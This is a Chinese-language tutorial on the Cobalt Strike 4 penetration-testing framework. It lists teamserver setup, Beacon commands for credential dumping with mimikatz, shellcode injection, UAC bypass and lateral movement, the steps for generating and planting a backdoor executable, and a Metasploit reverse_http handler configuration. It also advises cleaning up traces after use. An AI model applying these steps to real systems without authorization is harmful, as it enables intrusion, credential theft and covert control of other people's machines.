内网渗透神器CobaltStrike4简单使用教程
字数 1996 2025-08-15 21:32:45
Cobalt Strike 4 内网渗透工具详细使用教程
一、Cobalt Strike 简介
Cobalt Strike 是一款基于 Metasploit 的 GUI 框架式渗透测试工具,主要用于内网渗透测试和作为 APT 控制终端。主要功能包括:
- 端口转发与服务扫描
- 自动化溢出攻击
- 多模式端口监听
- 多种木马生成(exe、powershell等)
- 钓鱼攻击(站点克隆、目标信息获取、Java执行、浏览器自动攻击等)
- 团队协作功能,允许多个攻击者共享攻击资源和会话
二、环境搭建
1. 服务端启动
关键文件:
teamserver- 服务端主程序cobaltstrike.jar- 客户端程序
启动命令:
sudo ./teamserver <host> <password> [/path/to/c2.profile]
参数说明:
host:必填,服务器外网IP/域名password:必填,客户端连接密码[/path/to/c2.profile]:可选,指定C2通信配置文件
示例:
sudo ./teamserver 192.168.1.136 mypassword
2. 客户端连接
- 运行
cobaltstrike.jar - 配置连接参数(与服务端启动配置一致)
- 点击连接进入主界面
三、界面功能详解
1. 主工具栏
- 新建链接:支持连接多个服务端
- 设置:配置控制台界面
- 可视化:展示控制形式
- VPN接口:配置VPN
- 监听器:管理监听配置
- 脚本管理器:管理第三方脚本
2. 视图功能
- 应用信息:显示被攻击机器的应用信息
- 凭证信息:存储通过hashdump或mimikatz获取的密码
- 文件下载:下载文件功能
- 日志:事件记录
- 键盘记录:记录键盘输入
- 代理信息:显示代理配置
- 屏幕截图:截取被攻击者屏幕
- 脚本控制台:脚本命令执行界面
- 目标:显示目标主机
- web日志:记录web活动
3. 攻击功能
- HTML Application:生成恶意HTA木马文件
- MS Office Macro:生成office宏病毒文件
- Payload Generator:生成各种语言版本的payload
- Windows Executable:生成可执行Payload
- Windows Executable(S):生成包含多数功能的Stageless可执行文件
Web攻击功能:
- web服务管理:管理开启的web服务
- 克隆网站:网站克隆功能
- 文件下载:提供web下载文件
- Scripted Web Delivery:提供Web服务便于下载和执行PowerShell Payload
- 签名Applet攻击:提供自签名Java Applet运行环境
- 智能攻击:自动检测Java版本并利用已知漏洞绕过安全机制
- 信息搜集:获取系统信息
四、Beacon 命令详解
Beacon是Cobalt Strike的核心功能模块,提供丰富的命令集:
基本命令
help 显示帮助信息
cd 切换目录
ls 列出文件
pwd 显示当前目录
mkdir 创建目录
rm 删除文件或文件夹
cp 复制文件
mv 移动文件
download 下载文件
upload 上传文件
clear 清除beacon内部任务队列
exit 终止beacon会话
sleep 设置睡眠延迟时间
权限提升
elevate 使用exp提权
getprivs 启用系统权限
getsystem 尝试获取SYSTEM权限
bypassuac 绕过UAC提升权限
进程操作
ps 显示进程列表
kill 结束进程
inject 注入进程生成会话
dllinject 反射DLL注入进程
dllload 使用LoadLibrary加载DLL
shinject 将shellcode注入进程
shspawn 启动进程并注入shellcode
凭证获取
hashdump 转储密码哈希值
logonpasswords 使用mimikatz转储凭据和哈希值
mimikatz 运行mimikatz
wdigest 使用mimikatz转储明文凭据
dcsync 从DC中提取密码哈希
kerberos_ccache_use 从ccache文件导入票据
kerberos_ticket_purge 清除当前会话票据
kerberos_ticket_use 从ticket文件导入票据
横向移动
psexec 使用服务生成会话
psexec_psh 使用PowerShell生成会话
wmi 使用WMI横向渗透
winrm 使用WinRM横向渗透
ssh 使用SSH连接远程主机
ssh-key 使用密钥连接远程主机
其他功能
desktop 远程桌面(VNC)
screenshot 屏幕截图
keylogger 键盘记录
portscan 端口扫描
rportfwd 端口转发
socks 启动SOCKS4代理
covertvpn 部署Covert VPN客户端
五、基本使用流程
1. 创建监听器
Cobalt Strike提供8种监听器:
- beacon_xx系列:Cobalt Strike自身监听器
- dns
- http
- https
- smb
- foreign系列:外部监听器,用于与MSF或Armitage联动
创建步骤:
- 点击"监听器"菜单
- 选择监听器类型
- 配置监听参数(IP、端口等)
- 确认创建
2. 生成后门
步骤:
- 点击"攻击"菜单
- 选择"生成后门"→"Windows Executable"
- 选择之前创建的监听器
- 根据目标系统选择32位或64位
- 保存生成的exe文件
3. 目标上线
- 将生成的后门程序上传到目标机器
- 运行后门程序
- 在Cobalt Strike界面查看上线主机
4. 提权操作
- 在上线主机右键菜单
- 选择"提权"→"uac提权"
- 成功后会出现新的高权限会话
六、与Metasploit联动
1. MSF端配置
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost 172.16.20.18
msf5 exploit(multi/handler) > set lport 3333
msf5 exploit(multi/handler) > run
2. Cobalt Strike端配置
- 创建新的监听器
- payload类型需与MSF端一致
- 在控制会话中右键
- 选择"增加会话",选择MSF的会话
3. 获取meterpreter
成功联动后,可在MSF中获取meterpreter会话,执行:
meterpreter > shell
进入目标主机命令行环境
七、扩展工具 - Ladon脚本
Ladon脚本可增强Cobalt Strike的功能:
- 下载地址:https://github.com/k8gege/Ladon
- 使用文档:https://github.com/k8gege/Aggressor
主要功能:
- 增强命令执行能力
- 提供更多内网渗透功能
- 简化复杂操作流程
八、安全建议
- 仅用于合法授权的渗透测试
- 使用后及时清理痕迹
- 注意工具本身的漏洞和安全更新
- 在隔离环境中测试和学习
本教程详细介绍了Cobalt Strike 4的核心功能和使用方法,从环境搭建到高级功能联动,涵盖了内网渗透测试的主要技术点。实际使用时请遵守法律法规,仅用于授权测试。